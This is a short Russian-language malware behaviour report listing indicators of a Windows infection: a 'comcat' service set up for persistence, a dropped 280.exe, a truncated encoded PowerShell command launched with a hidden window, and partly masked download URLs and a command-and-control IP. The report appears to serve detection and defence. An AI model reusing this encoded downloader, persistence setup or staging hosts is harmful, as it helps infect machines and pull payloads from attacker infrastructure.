Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\comcat] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\comcat] 'ImagePath' = '"%WINDIR%\SysWOW64\newdev\comcat.exe"'
- 'comcat' "%WINDIR%\SysWOW64\newdev\comcat.exe"
- 'comcat' %WINDIR%\SysWOW64\newdev\comcat.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEsAUABVAFcAZQBrAGIAPQAnAEYATABRAEoATwBkAGEAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBgAFIASQBgAFQAWQBwAFIATwBUAE8AYwBvAEwAIgAgAD...
- %HOMEPATH%\280.exe
- %WINDIR%\syswow64\newdev\comcat.exe
- %HOMEPATH%\280.exe в %WINDIR%\syswow64\newdev\comcat.exe
- '14#.#05.151.124':443
- http://pu###rfiz.net/btrsports/3_qr_elsv8z8sb/
- http://rn###ork.com.br/administrator/itn1q_s_nhf/
- http://es##ft.com/cgi-bin/bmkhn_v_pd5gahs8/
- http://14#.##5.151.124:443/hXsk/lUWcuxGna7XMD54bXvf/JsLG9h/AlKx/Na3YrdtHHGr/ via 14#.#05.151.124
- DNS ASK pu###rfiz.net
- DNS ASK rn###ork.com.br
- DNS ASK es##ft.com
- '%HOMEPATH%\280.exe'
- '%WINDIR%\syswow64\newdev\comcat.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEsAUABVAFcAZQBrAGIAPQAnAEYATABRAEoATwBkAGEAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBgAFIASQBgAFQAWQBwAFIATwBUAE8AYwBvAEwAIgAgAD...' (со скрытым окном)